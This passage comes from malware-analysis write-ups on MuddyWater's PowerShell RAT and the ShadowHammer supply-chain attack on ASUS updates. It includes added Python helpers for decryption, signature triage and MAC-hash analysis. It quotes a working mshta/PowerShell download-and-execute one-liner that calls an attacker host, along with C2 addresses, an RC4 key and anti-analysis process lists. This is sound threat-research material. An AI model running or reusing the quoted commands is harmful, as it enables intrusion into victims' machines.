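    iv, ciphertext = blob[:4], blob[4:]
    # -join [char[]](...) turns each byte into one character, i.e. Latin-1.
    return rc4(ciphertext, iv + key).decode('latin-1')


def build_response(plaintext: str, iv: bytes, key: bytes = KEY) -> str:
    """Constructed helper (not part of the actor's tooling): wrap text in the same
    layout the server uses, so decrypt_stage can be tested without any network traffic."""
    if len(iv) != 4:
        raise ValueError('IV must be exactly 4 bytes')
    return base64.b64encode(iv + rc4(plaintext.encode('latin-1'), iv + key)).decode()


# Constructed sample: a harmless "next stage" wrapped as the server would send it.
SAMPLE_STAGE = "Write-Host 'constructed sample stage'"
SAMPLE_RESPONSE = build_response(SAMPLE_STAGE, b'\x01\x02\x03\x04')

if __name__ == '__main__':
    print(decrypt_stage(SAMPLE_RESPONSE))
```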

Case 2: We also identified MuddyWater’s PowerShell prototype RAT implementing functions to collect user info (internal IP address, user name, domain name, 32bit/64bit), RC4 encryption/decryption, Base64 encoding and decoding, changing cached group policy settings (cachedGroupPolicySettings) for PowerShell security settings, EnableScriptBlockLogging, EnableScriptBlockInvocationLogging. It also disables all HTTPS SSL certificate checks.

We have seen cases where the above was renamed to “km” and directly invoked with its C2 IP set to “78.129.139[.]134”, port “8080” and RC4 key set to “KharashoNIKharasho!@#123456_6”:

km -ip -port 8080 -Key KharashoNIKharasho!@#123456_6 -Delay 20

Case 3: We found an interesting case (apparently exclusive to this actor) of a WinRAR SFX (self-extracting archive) named “Iranicard.exe”. The embedded SFX pre-setup script is an MSHTA one-liner, which invokes a PowerShell one-liner that downloads and executes PowerShell code from ‘https://dzoz[.]us/js/js.js’.

Presetup=mshta vbscript:Close(Execute("CreateObject(""WScript.Shell"").run ""powershell.exe -nop -w hidden -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $V.downloadstring('https://dzoz.us/js/js.js');"",0"))

Attribution, distraction and OPSEC

In our analysis of this actor’s activities we have detected multiple OPSEC mistakes and analyzed some of the distraction techniques it has used. Among the OPSEC mistakes, there were multiple PDB file paths left in some samples or in artifacts collected from the C2 server.

Dragon and Panda strings

The .Net RAT called “LisfonService” has PDB file paths referring to “dragon” and “Panda” as user names.

C:\Users\dragon\Documents\Visual Studio 2015\Projects\64\Telegram\LisfonService\obj\Release\LisfonService.pdb

Dragon in LisfonService PDB File Path

C:\Users\Panda\Documents\Visual Studio 2010\Projects\TestService\TestService\obj\x86\Release\TestService.pdb

Panda in TestService (LisfonService Earlier Version) PDB File Path

Panda and dragon could have been deliberately used to point researchers to a possible Chinese actor, or it may just be the way attackers like to refer to themselves. It is worth mentioning that in some of the PowerShell RATs, attackers also used the “$dragon_middle” variable name for an array of C2 proxy URLs.

$dragon_middle from the Powershell samples

User names inside weaponized word documents

Multiple weaponized Office Word documents also contain embedded paths from their authors’ machines. Office embeds these paths under various circumstances: for instance, when somebody adds a binary object (like an OLE control such as a text box or a command button) to a Word document. These embedded paths reveal the following user names: poopak, leo, Turk and Vendetta:

C:\Users\Vendetta\AppData\Local\Temp\Word8.0\MSForms.exd

Chinese language strings

Multiple Chinese strings can be found in some PowerShell RAT payloads (such as Ffb8ea0347a3af3dd2ab1b4e5a1be18a) that seem to have been left in on purpose, probably to make attribution harder.

if (IQQXIJFBIIVIOKFCSXFHBBQFFDMWTL -p "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -k "MalwareDefenderSDK" -v "wscript $tempPath$filenamePathV" -eq "error"){ Write-Host "无法访问本地计算机寄存器" } try{ schtasks /Create /RU system /SC ONLOGON /TN Microsoft\WindowsMalwareDefenderSDK /TR "wscript $tempPath$filenamePathV" /F } catch{ Write-Host "任务计划程序访问被拒绝" } } [System.Net.WebResponse] $resp = $webreq.GetResponse(); if ($resp -ne $null){ $data = $resp.GetResponseStream(); [System.IO.StreamReader] $res_data = New-Object System.IO.StreamReader $data; [String] $result = $res_data.ReadToEnd(); } } catch { Write-Host '无法连接到网址,请等待龙...' $result = "error" }

Russian strings and impersonation of “RXR Saudi Arabia” hacking group

In another PowerShell sample (md5: e684aa1c6e51f4696a836ecb6ff1e143, filename: km.ps1), attackers used Russian words as the RC4 key when establishing a connection to the C2 server (78.129.139[.]134).

km -ip -port 8080 -Key KharashoNIKharasho!@#123456_6 -Delay 20

Moreover, IP 78.129.139[.]134 is used as a C2 for other samples as well. Interestingly, when visiting the C2, it displays a blank webpage whose HTML source code shows a strange HTML tag value that suggests the attackers have tried to impersonate a Saudi hacking group called RXR Saudi Arabia.


MuddyWater attacks have been expanding in recent years in terms of targets and malware functionality. The attackers seem to be reasonably well-equipped for their goals, with relatively simple and expendable tools to infiltrate victims and exfiltrate data, mostly using Python and PowerShell-based tools. These tools also seem to allow them flexibility to adapt and customize the toolset for victims.

This continuous capability to steadily adjust and enhance attacks, adapting well to the changing Middle Eastern geopolitical scene, seems to make this actor a solid adversary that keeps growing. We expect it to keep developing or acquiring additional tools and abilities, possibly including zero-days. Nevertheless, its current OPSEC should be considered poor – for example, leaving details which could reveal different types of information about them.

For more information about the attacks and the indicators of compromise, please contact: intelreports@kaspersky.com

23 April 2019

Operation ShadowHammer: a high-profile supply chain attack

In late March 2019, we briefly highlighted our research on ShadowHammer attacks, a sophisticated supply chain attack involving ASUS Live Update Utility, which was featured in a Kim Zetter article on Motherboard. The topic was also one of the research announcements made at the SAS conference, which took place in Singapore on April 9-10, 2019. Now it is time to share more details about the research with our readers.

At the end of January 2019, Kaspersky Lab researchers discovered what appeared to be a new attack on a large manufacturer in Asia. Our researchers named it “Operation ShadowHammer”.

Some of the executable files, which were downloaded from the official domain of a reputable and trusted large manufacturer, contained apparent malware features. Careful analysis confirmed that the binary had been tampered with by malicious attackers.

It is important to note that any, even tiny, tampering with executables in such a case normally breaks the digital signature. However, in this case, the digital signature was intact: valid and verifiable. We quickly realized that we were dealing with a case of a compromised digital signature.

We believe this to be the result of a sophisticated supply chain attack, which matches or even surpasses the ShadowPad and the CCleaner incidents in complexity and techniques. The reason that it stayed undetected for so long is partly the fact that the trojanized software was signed with legitimate certificates (e.g. “ASUSTeK Computer Inc.”).

The goal of the attack was to surgically target an unknown pool of users, who were identified by their network adapters’ MAC addresses. To achieve this, the attackers had hardcoded a list of MAC addresses into the trojanized samples and the list was used to identify the intended targets of this massive operation. We were able to extract more than 600 unique MAC addresses from more than 200 samples used in the attack. There might be other samples out there with different MAC addresses on their lists, though.

Technical details

The research started upon the discovery of a trojanized ASUS Live Updater file (setup.exe), which contained a digital signature of ASUSTeK Computer Inc. and had been backdoored using one of the two techniques explained below.

In earlier variants of ASUS Live Updater (i.e. MD5:0f49621b06f2cdaac8850c6e9581a594), the attackers replaced the WinMain function in the binary with their own. This function copies a backdoor executable from the resource section using a hardcoded size and offset to the resource. Once copied to the heap memory, another hardcoded offset, specific to the executable, is used to start the backdoor. The offset points to a position-independent shellcode-style function that unwraps and runs the malicious code further.

Some of the older samples revealed the project path via a PDB file reference: “D:\C++\AsusShellCode\Release\AsusShellCode.pdb”. This suggests that the attackers had exclusively prepared the malicious payload for their target. A similar tactic of precise targeting has become a persistent property of these attackers.

A look at the resource section used for carrying the malicious payload revealed that the attackers had decided not to change the file size of the ASUS Live Updater binary. They changed the resource contents and overwrote a tiny block of the code in the subject executable. The layout of that patched file is shown below.

We managed to find the original ASUS Live Updater executable which had been patched and abused by the attackers. As a result, we were able to recover the overwritten data in the resource section. The file we found was digitally signed and certainly had no infection present.

Both the legitimate ASUS executable and the resource-embedded updater binary contain timestamps from March 2015. Considering that the operation took place in 2018, this raises the following question: why did the attackers choose an old ASUS binary as the infection carrier?

Another injection technique was found in more recent samples. Using that technique, the attackers patched the code inside the C runtime (CRT) library function “___crtExitProcess”. The malicious code executes a shellcode loader instead of the standard function “___crtCorExitProcess”:

This way, the execution flow is passed to another address which is located at the end of the code section. The attackers used a small decryption routine that can fit into a block at the end of the code section, which has a series of zero bytes in the original executable. They used the same source executable file from ASUS (compiled in March 2015) for this new type of injection.

The loader code copies another block of encrypted shellcode from the file’s resource section (of the type “EXE”) to a newly allocated memory block with read-write-execute attributes and decrypts it using a custom block-chaining XOR algorithm, where the first dword is the initial seed and the total size of the shellcode is stored at an offset of +8.

We believe that the attackers changed the payload start routine in an attempt to evade detection. Apparently, they switched to a better method of hiding their embedded shellcode at some point between the end of July and September 2018.

ShadowHammer downloader

The compromised ASUS binaries carried a payload that was a Trojan downloader. Let us take a closer look at one such ShadowHammer downloader extracted from a copy of the ASUS Live Updater tool with MD5:0f49621b06f2cdaac8850c6e9581a594. It has the following properties:

  • MD5: 63f2fe96de336b6097806b22b5ab941a
  • SHA1: 6f8f43b6643fc36bae2e15025d533a1d53291b8a
  • SHA256: 1bb53937fa4cba70f61dc53f85e4e25551bc811bf9821fc47d25de1be9fd286a
  • Digital certificate fingerprint: 0f:f0:67:d8:01:f7:da:ee:ae:84:2e:9f:e5:f6:10:ea
  • File Size: 1’662’464 bytes
  • File Type: PE32 executable (GUI) Intel 80386, for MS Windows
  • Link Time: 2018.07.10 05:58:19 (GMT)

The relatively large file size is explained by the presence of partial data from the original ASUS Live Updater application appended to the end of the executable. The attackers took the original Live Updater and overwrote it with their own PE executable starting from the PE header, so that the file contains the actual PE image, whose size is only 40448 bytes, while the rest comes from ASUS. The malicious executable was created using Microsoft Visual C++ 2010.

The core function of this executable is in a subroutine which is called from WinMain, but also executed directly via a hardcoded offset from the code injected into ASUS Live Updater.

The code uses dynamic import resolution with its own simple hashing algorithm. Once the imports are resolved, it collects MAC addresses of all available network adapters and calculates an MD5 hash for each of these. After that, the hashes are compared against a table of 55 hardcoded values. Other variants of the downloader contained a different table of hashes, and in some cases, the hashes were arranged in pairs.

In other words, the malware iterates through a table of hashes and compares them to the MD5 hashes of the local adapters’ MAC addresses. This way, the target system is recognized and the malware proceeds to the next stage, downloading a binary object from https://asushotfix[.]com/logo.jpg (or https://asushotfix[.]com/logo2.jpg in newer samples). The malware also sends the first hash from the matching entry as a parameter in the request to identify the victim. The server response is expected to be executable shellcode, which is placed in newly allocated memory and started.

Our investigation uncovered 230 unique samples with different shellcodes and different sets of MAC address hashes. This leads us to believe that the campaign targeted a vast number of people or companies. In total, we were able to extract 14 unique hash tables. The smallest hash table found contained eight entries and the biggest, 307 entries. Interestingly, although the subset of hash entries was changing, some of the entries were present in all of the tables.

For all users whose MAC did not match expected values, the code would create an INI file located two directory levels above the current executable and named “idx.ini”. Three values were written into the INI file under the [IDX_FILE] section:

[IDX_FILE]

where YYYY-MM-DD is a date one week ahead of the current system date.

The code injected by the attackers was discovered with over 57000 Kaspersky Lab users. It would run but remain silent on systems that were not primary targets, making it almost impossible to discover the anomalous behavior of the trojanized executables. The exact total of the affected users around the world remains unknown.

Digital signature abuse

A lot of computer security software deployed today relies on integrity control of trusted executables. Digital signature verification is one such method. In this attack, the attackers managed to get their code signed with a certificate of a big vendor. How was that possible? We do not have definitive answers, but let us take a look at what we observed.

First of all, we noticed that all backdoored ASUS binaries were signed with two different certificates. Here are their fingerprints:

  • 0ff067d801f7daeeae842e9fe5f610ea
  • 05e6a0be5ac359c7ff11f4b467ab20fc

The same two certificates have been used in the past to sign at least 3000 legitimate ASUS files (e.g. ASUS GPU Tweak, ASUS PC Link and others), which makes it very hard to revoke these certificates.

All of the signed binaries share certain interesting features: none of them had a signing timestamp set, and the digest algorithm used was SHA1. The reason for this could be an attempt at hiding the time of the operation to make it harder to discover related forensic artefacts.
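As an added defender-side example (not from the report), this Python triages a signed PE for the two traits just described, a SHA1 digest and a missing timestamp countersignature: it pulls the PKCS#7 blob out of the PE security data directory and reads the digestAlgorithms set of the SignedData structure. The timestamp check is a presence scan for the PKCS#9 counterSignature and Microsoft RFC 3161 attribute OIDs (adequate for triage, not a full SignerInfo parse); build_sample produces a constructed, structurally minimal blob so the logic can be tested offline.

```python
OID_SIGNED_DATA = '1.2.840.113549.1.7.2'
OID_SHA1 = '1.3.14.3.2.26'
OID_SHA256 = '2.16.840.1.101.3.4.2.1'
# Either attribute in a signer's unsignedAttrs carries a timestamp.
OID_TIMESTAMP_ATTRS = ('1.2.840.113549.1.9.6', '1.3.6.1.4.1.311.3.3.1')


def der(tag: int, body: bytes) -> bytes:
    """Minimal DER TLV encoder, used only to build the constructed sample below."""
    assert len(body) < 0x80          # short-form lengths suffice for the sample
    return bytes([tag, len(body)]) + body


def encode_oid(dotted: str) -> bytes:
    parts = [int(p) for p in dotted.split('.')]
    out = [40 * parts[0] + parts[1]]
    for p in parts[2:]:
        chunk = [p & 0x7F]
        p >>= 7
        while p:
            chunk.append(0x80 | (p & 0x7F))
            p >>= 7
        out.extend(reversed(chunk))
    return bytes(out)


def decode_oid(raw: bytes) -> str:
    parts = [raw[0] // 40, raw[0] % 40]
    value = 0
    for b in raw[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            parts.append(value)
            value = 0
    return '.'.join(map(str, parts))


def tlv(buf: bytes, pos: int = 0):
    """Parse one DER element at pos -> (tag, value, position after the element)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], 'big')
        pos += n
    return tag, buf[pos:pos + length], pos + length


def pkcs7_from_pe(data: bytes):
    """Return the WIN_CERTIFICATE payload from a PE's security directory (None if unsigned)."""
    pe = int.from_bytes(data[0x3C:0x40], 'little')
    if data[pe:pe + 4] != b'PE\x00\x00':
        raise ValueError('not a PE image')
    opt = pe + 24                                  # optional header follows the 20-byte COFF header
    magic = int.from_bytes(data[opt:opt + 2], 'little')
    dirs = opt + (112 if magic == 0x20B else 96)  # data directories: PE32+ vs PE32
    off = int.from_bytes(data[dirs + 32:dirs + 36], 'little')   # entry 4 = SECURITY (file offset)
    size = int.from_bytes(data[dirs + 36:dirs + 40], 'little')
    if not off or not size:
        return None
    length = int.from_bytes(data[off:off + 4], 'little')        # WIN_CERTIFICATE.dwLength
    return data[off + 8:off + length]                            # skip dwLength, wRevision, wCertificateType


def triage_signature(pkcs7: bytes) -> dict:
    """Flag the two traits noted above: SHA1 digest algorithm and no timestamp attribute."""
    tag, content_info, _ = tlv(pkcs7)
    _, ctype, p = tlv(content_info)
    if tag != 0x30 or decode_oid(ctype) != OID_SIGNED_DATA:
        raise ValueError('not a PKCS#7 SignedData structure')
    _, explicit0, _ = tlv(content_info, p)       # [0] EXPLICIT wrapper
    _, signed_data, _ = tlv(explicit0)           # SignedData SEQUENCE
    _, _version, p = tlv(signed_data)            # INTEGER version
    _, alg_set, _ = tlv(signed_data, p)          # SET OF DigestAlgorithmIdentifier
    digests, p = [], 0
    while p < len(alg_set):
        _, alg_id, p = tlv(alg_set, p)
        digests.append(decode_oid(tlv(alg_id)[1]))
    timestamped = any(der(0x06, encode_oid(o)) in pkcs7 for o in OID_TIMESTAMP_ATTRS)
    return {'digest_algorithms': digests, 'sha1_digest': OID_SHA1 in digests,
            'timestamped': timestamped, 'suspicious': OID_SHA1 in digests and not timestamped}


def build_sample(digest_oid: str, timestamped: bool) -> bytes:
    """Constructed, structurally minimal SignedData: no real certificates or signature value."""
    alg = der(0x30, der(0x06, encode_oid(digest_oid)) + der(0x05, b''))
    unsigned = der(0x31, der(0x30, der(0x06, encode_oid(OID_TIMESTAMP_ATTRS[0])) + der(0x31, b''))) if timestamped else b''
    signer = der(0x30, der(0x02, b'\x01') + unsigned)
    body = der(0x02, b'\x01') + der(0x31, alg) + der(0x30, der(0x06, encode_oid('1.2.840.113549.1.7.1'))) + der(0x31, signer)
    return der(0x30, der(0x06, encode_oid(OID_SIGNED_DATA)) + der(0xA0, der(0x30, body)))
```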

Although there is no timestamp that can be relied on to understand when the attack started, there is a mandatory field in the certificate, “Certificate Validity Period”, which can help us to understand roughly the timeframe of the operation. Apparently, because the certificate that the attackers relied on expired in 2018 and therefore had to be reissued, they used two different certificates.

Another notable fact is that both abused certificates are from the DigiCert SHA2 Assured ID Code Signing CA.

The legitimate ASUS binaries that we have observed use a different certificate, which was issued by the DigiCert EV Code Signing CA (SHA2). EV stands for “Extended Validation” and provides for stricter requirements for the party that intends to use the certificate, including hardware requirements. We believe that the attackers simply did not have access to a production signing device with an EV certificate.

This indicates that the attackers most likely obtained a copy of the certificates or abused a system on the ASUS network that had the certificates installed. We do not know about all the malware-injected software they managed to sign, and we believe that the compromised signing certificates must be removed and revoked. Unfortunately, one month after this was reported to ASUS, newly released software (e.g. md5: 1b8d2459d4441b8f4a691aec18d08751) was still being signed with a compromised certificate. We immediately notified ASUS about this and provided evidence as required.

ASUS-related attack samples

Using decrypted shellcode and through code similarity, we found a number of related samples which appear to have been part of a parallel attack wave. These files have the following properties:

  • they contain the same shellcode style as the payload from the compromised ASUS Live Updater binaries, albeit unencrypted
  • they have a forgotten PDB path of “D:\C++\AsusShellCode\Release\AsusShellCode.pdb”
  • the shellcode from all of these samples connects to the same C2: asushotfix[.]com
  • all samples were compiled between June and July 2018
  • the samples have been detected on computers all around the globe

The hashes of these related samples include:


These files are dropped by larger setup files / installers, signed with an ASUS certificate (serial number: 0ff067d801f7daeeae842e9fe5f610ea, valid from 2015-07-27 till 2018-08-01).

The hashes of the larger installers/droppers include:

  • 0f49621b06f2cdaac8850c6e9581a594
  • 17a36ac3e31f3a18936552aff2c80249

At this point, we do not know how they were used in these attacks and whether they were delivered via a different mechanism. These files were located in a “TEMP” subfolder for ASUS Live Updater, so it is possible that the software downloaded these files directly. Locations where these files were detected include:

  • asus\asus live update\temp\1\Setup.exe
  • asus\asus live update\temp\2\Setup.exe
  • asus\asus live update\temp\3\Setup.exe
  • asus\asus live update\temp\5\Setup.exe
  • asus\asus live update\temp\6\Setup.exe
  • asus\asus live update\temp\9\Setup.exe

Public reports of the attack

While investigating this case, we were wondering how such a massive attack could go unnoticed on the Internet. Searching for any kind of evidence related to the attack, we came by a Reddit thread created in June 2018, where user GreyWolfx posted a screenshot of a suspicious-looking ASUS Live Update message:

The message claims to be an “ASUS Critical Update” notification; however, the item does not have a name or version number.

Other users commented in the thread, while some uploaded the suspicious updater to VirusTotal:

The file uploaded to VT is not one of the malicious compromised updates; we can assume the person who uploaded it actually uploaded the ASUS Live Update itself, as opposed to the update it received from the Internet. Nevertheless, this could suggest that potentially compromised updates were delivered to users as far back as June 2018.

In September 2018, another Reddit user, FabulaBerserko, also posted a message about a suspicious ASUS Live Update:

Asus_USA replied to FabulaBerserko with the following message, suggesting he run a scan for viruses:

In his message, the Reddit user FabulaBerserko talks about an update listed as critical, however without a name and with a release date of March 2015. Interestingly, the related attack samples containing the PDB “AsusShellCode.pdb” have a compilation timestamp from 2015 as well, so it is possible that the Reddit user saw the delivery of one such file through ASUS Live Update in September 2018.

Targets by MAC address

We managed to crack all of the 600+ MAC address hashes and analyzed distribution by manufacturer, using publicly available Ethernet-to-vendor assignment lists. It turns out that the distribution is uneven and certain vendors are a higher priority for the attackers. The chart below shows statistics we collected based on network adapter manufacturers’ names:

Some of the MAC addresses included on the target list were rather popular, e.g. 00-50-56-C0-00-08 belongs to the VMware virtual adapter VMNet8 and is the same for all users of a certain version of the VMware software for Windows. To prevent infection by mistake, the attackers used a secondary MAC address from the real Ethernet card, which made targeting more precise. However, it tells us that one of the targeted users used VMware, which is rather common for software engineers (for testing their software).

Another popular MAC was 0C-5B-8F-27-9A-64, which belongs to the MAC address of a virtual Ethernet adapter created by a Huawei USB 3G modem, model E3372h. It seems that all users of this device shared the same MAC address.
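The following is an added example (not from the report and not the downloader's code) that models two things described in this post: the downloader's gate, which MD5-hashes every local adapter MAC and looks the hashes up in a table whose entries may be pairs (a generic VMware or Huawei MAC plus the real NIC's MAC, as discussed above), and the recovery of targets by brute-forcing the 24-bit NIC part under a known vendor OUI. The MAC string form that is hashed (upper-case hex with dashes) is an assumption, since the report does not state it; the hash table here is constructed and does not reproduce the real target list.

```python
import hashlib
from typing import Iterable, Optional, Sequence, Union

HashEntry = Union[str, Sequence[str]]   # one hash, or a pair where both must match


def normalize_mac(mac: str) -> str:
    """Canonical form hashed here: upper-case hex with dashes, e.g. 00-50-56-C0-00-08.
    ASSUMPTION: the report does not state the exact string form the downloader hashed."""
    digits = ''.join(ch for ch in mac.upper() if ch in '0123456789ABCDEF')
    if len(digits) != 12:
        raise ValueError(f'not a 48-bit MAC: {mac!r}')
    return '-'.join(digits[i:i + 2] for i in range(0, 12, 2))


def mac_hash(mac: str) -> str:
    """MD5 of the canonical MAC string, as hex."""
    return hashlib.md5(normalize_mac(mac).encode('ascii')).hexdigest()


def matching_entry(adapter_macs: Iterable[str], table: Sequence[HashEntry]) -> Optional[HashEntry]:
    """Model the downloader's gate: hash every local adapter MAC and return the first table
    entry satisfied by this host. A paired entry needs both hashes present, which is how a
    generic VMware/Huawei MAC is disambiguated by the real NIC's MAC."""
    local = {mac_hash(m) for m in adapter_macs}
    for entry in table:
        wanted = {entry} if isinstance(entry, str) else set(entry)
        if wanted <= local:
            return entry
    return None


def crack_under_oui(target_hash: str, oui: str, nic_max: int = 1 << 24) -> Optional[str]:
    """Recover a MAC from its MD5 by trying every 24-bit NIC suffix under a known vendor OUI,
    the approach the report describes for recovering the 600+ targets. The full 16M space
    per OUI takes tens of seconds in pure Python; nic_max bounds the search for testing."""
    prefix = normalize_mac(oui + '000000')[:9]          # "XX-XX-XX-"
    for nic in range(nic_max):
        candidate = f'{prefix}{nic >> 16:02X}-{(nic >> 8) & 0xFF:02X}-{nic & 0xFF:02X}'
        if hashlib.md5(candidate.encode('ascii')).hexdigest() == target_hash:
            return candidate
    return None


# Constructed table: the two generic MACs named in the report, one paired with a made-up
# "real NIC" MAC. The actual hash tables from the samples are not reproduced here.
VMWARE_VMNET8 = '00-50-56-C0-00-08'
HUAWEI_E3372H = '0C-5B-8F-27-9A-64'
CONSTRUCTED_REAL_NIC = '00-50-56-00-00-2A'              # constructed value
CONSTRUCTED_TABLE = [
    (mac_hash(VMWARE_VMNET8), mac_hash(CONSTRUCTED_REAL_NIC)),   # paired entry
    mac_hash(HUAWEI_E3372H),                                     # single entry
]

if __name__ == '__main__':
    print(matching_entry([VMWARE_VMNET8, CONSTRUCTED_REAL_NIC], CONSTRUCTED_TABLE))
    print(crack_under_oui(mac_hash(CONSTRUCTED_REAL_NIC), '00-50-56', nic_max=4096))
```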

Interaction with ASUS

The day after the ShadowHammer discovery, we created a short report for ASUS and approached the company through our local colleagues in Taiwan, providing all details of what was known about the attack and hoping for cooperation. The following is a timeline of the discovery of this supply-chain attack, together with ASUS interaction and reporting:

  • 29-Jan-2019 – initial discovery of the compromised ASUS Live Updater
  • 30-Jan-2019 – created preliminary report to be shared with ASUS, briefed Kaspersky Lab colleagues in Taipei
  • 31-Jan-2019 – in-person meeting with ASUS, teleconference with researchers; we notified ASUS of the finding and shared hard copy of the preliminary attack report with indicators of compromise and Yara rules. ASUS provided Kaspersky with the latest version of ASUS Live Updater, which was analyzed and found to be uninfected.
  • 01-Feb-2019 – ASUS provides an archive of all ASUS Live Updater tools beginning from 2018. None of them were infected, and they were signed with different certificates.
  • 14-Feb-2019 – second face-to-face meeting with ASUS to discuss the details of the attack
  • 20-Feb-2019 – update conf call with ASUS to provide newly found details about the attack
  • 08-Mar-2019 – provided the list of targeted MAC addresses to ASUS, answered other questions related to the attack
  • 08-Apr-2019 – provided a comprehensive report on the current attack investigation to ASUS.

We appreciate the quick response from our ASUS colleagues just days before one of the largest holidays in Asia (Lunar New Year). This helped us to confirm that the attack was in a deactivated stage and there was no immediate risk of new infections, and gave us more time to collect further artefacts. However, all compromised ASUS binaries had to be properly flagged as containing malware and removed from Kaspersky Lab users’ computers.

Non-ASUS-related cases

In our search for similar malware, we came across other digitally signed binaries from three other vendors in Asia.

One of these vendors is a game development company from Thailand known as Electronics Extreme Company Limited. The company has released digitally signed binaries of a video game called “Infestation: Survivor Stories”. It is a zombie survival game in which players endure the hardships of a post-apocalyptic, zombie-infested world. According to Wikipedia, “the game was panned by critics and is considered one of the worst video games of all time”. The game servers were taken offline on December 15, 2016.

The history of this videogame itself contains many controversies. According to Wikipedia, it was originally developed under the title of “The War Z” and released by OP Productions, which put it in the Steam store in December 2012. On April 4, 2013, the game servers were compromised, and the game source code was most probably stolen and released to the public.

It seems that certain videogame companies picked up this available code and started making their own versions of the game. One such version (md5: de721e2f055f1b203ab561dda4377bab) was digitally signed by Innovative Extremist Co. LTD., a company from Thailand that currently provides web & IT infrastructure services. The game also contains a logo of Electronics Extreme Company Limited with a link to their website. The homepage of Innovative Extremist also listed Electronics Extreme as one of their partners.

Notably, the certificate from Innovative Extremist that was used to sign Infestation is currently revoked. However, the story does not end here. It seems that Electronics Extreme picked up the video game where Innovative Extremist dropped it. And now the game seems to be causing trouble again. We found at least three samples of Infestation signed by Electronics Extreme with a certificate that now also needs to be revoked.

We believe that a poorly maintained development environment, leaked source code, as well as vulnerable production servers were at the core of the bad luck chasing this videogame. Ironically, this game about infestation brought only trouble and a serious infection to its developers.

Several executable files from the popular FPS videogame PointBlank contained a similar malware injection. The game was developed by the South Korean company Zepetto Co, whose digital signature was also abused. Although the certificate was still unrevoked as of early April, Zepetto seems to have stopped using the certificate at the end of February 2019.

While some details about this case were announced in March 2019 by our colleagues at ESET, we have been working on this in parallel with ESET and uncovered some additional facts.

All these cases involve digitally signed binaries from three vendors based in three different Asian countries. They are signed with different certificates and a unique chain of trust. What is common to these cases is the way the binaries were trojanized.

The code injection happened through modification of commonly used functions such as the CRT (C runtime), which is similar to the ASUS case. However, the implementation is very different in the case of the videogame companies. In the ASUS case, the attackers only tampered with a compiled ASUS binary from 2015 and injected additional code. In the other cases, the binaries were recent (from the end of 2018). The malicious code was not inserted as a resource, nor did it overwrite the unused zero-filled space inside the programs. Instead, it seems to have been neatly compiled into the program, and in most cases it starts at the beginning of the code section, as if it had been added even before the legitimate code. Even the data with the encrypted payload is stored inside this code section. This indicates that the attackers either had access to the source code of the victims’ projects or injected the malware on the premises of the breached companies at the time of project compilation.

Payload from non-ASUS-related cases

The payload included into the compromised videogames is rather simple. First of all, it checks whether the process has administrative privileges.

Next, it checks the registry value at HKCU\SOFTWARE\Microsoft\Windows\{0753-6681-BD59-8819}. If the value exists and is non-zero, the payload does not run further. Otherwise, it starts a new thread with a malicious intent.

The file contains a hardcoded mini-config; its contents are listed below.

  • C2 URL: https://nw.infestexe[.]com/version/last.php
  • Sleep time: 240000
  • Target Tag: warz
  • Unwanted processes: wireshark.exe;perfmon.exe;procmon64.exe;procmon.exe;procexp.exe;procexp64.exe;netmon.exe

Apparently, the backdoor was specifically created for this target, which is confirmed by an internal tag (the previous name of the game is “The War Z”).

If any of the unwanted processes is running, or the system language ID is Simplified Chinese or Russian, the malware does not proceed. It also checks for the presence of a mutex named Windows-{0753-6681-BD59-8819}, which is also a sign to stop execution.

After all checks are done, the malware gathers information about the system including:

  • Network adapter MAC address
  • System username
  • System hostname and IP address
  • Windows version
  • CPU architecture
  • Current host FQDN
  • Domain name
  • Current executable file name
  • Drive C: volume name and serial number
  • Screen resolution
  • System default language ID

This information is concatenated in one string using the following string template: “%s|%s|%s|%s|%s|%s|%s|%dx%d|%04x|%08X|%s|%s”.

Then the malware crafts a host identifier, which is made up of the C drive serial number string XOR-ed with the hardcoded string “*&b0i0rong2Y7un1” and encoded with the Base64 algorithm. Later on, the C: serial number may be used by the attackers to craft unique backdoor code that runs only on a system with identical properties.
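
The host identifier described above, as an added example that is not code from the original write-up: it builds the identifier from a volume serial and, more usefully for a responder, inverts it, so an identifier seen in proxy logs or C2 traffic can be mapped back to the machine’s C: volume serial. The byte layout is an assumption: the write-up only says the serial string is XOR-ed with the key and Base64-encoded, so the code assumes the 8 uppercase hex digits of the %08X template field and a repeating-key XOR.

```python
import base64
import binascii

# Hardcoded XOR key quoted in the write-up above.
XOR_KEY = b"*&b0i0rong2Y7un1"
HEX_DIGITS = b"0123456789ABCDEF"


def _xor_with_key(buf: bytes) -> bytes:
    """Repeating-key XOR (assumed mode; the write-up only says 'XOR-ed')."""
    return bytes(b ^ XOR_KEY[i % len(XOR_KEY)] for i, b in enumerate(buf))


def make_host_id(serial_hex: str) -> str:
    """Build the backdoor's host identifier from a C: volume serial number.

    Assumption: the serial is the 8 uppercase hex digits produced by the %08X
    field of the system-info template, XORed byte-by-byte with XOR_KEY and then
    Base64-encoded.
    """
    raw = serial_hex.upper().encode("ascii")
    if len(raw) != 8 or any(c not in HEX_DIGITS for c in raw):
        raise ValueError("volume serial must be 8 hex digits")
    return base64.b64encode(_xor_with_key(raw)).decode("ascii")


def recover_serial(host_id: str) -> str:
    """Invert make_host_id: recover the volume serial from an identifier seen in C2 traffic."""
    return _xor_with_key(base64.b64decode(host_id, validate=True)).decode("ascii")


def looks_like_host_id(token: str) -> bool:
    """Log-hunting heuristic: does this token decode to an 8-digit hex serial under XOR_KEY?"""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return False
    if len(raw) != 8:
        return False
    return all(c in HEX_DIGITS for c in _xor_with_key(raw))


if __name__ == "__main__":
    # Constructed sample serial, not taken from a real system.
    sample = make_host_id("1A2B3C4D")
    print(sample, recover_serial(sample), looks_like_host_id(sample))
```

Because the transform is reversible, the identifier carries the volume serial in the clear to anyone who knows the key, which is what makes it usable for victim identification on the defender’s side as well.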

The malware uses HTTP for communication with a C2 server and crafts HTTP headers on its own. It uses the following hardcoded User-Agent string: “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36”

Interestingly, when the malware identifies the Windows version, it uses a long list:

  • Microsoft Windows NT 4.0
  • Microsoft Windows 95
  • Microsoft Windows 98
  • Microsoft Windows Me
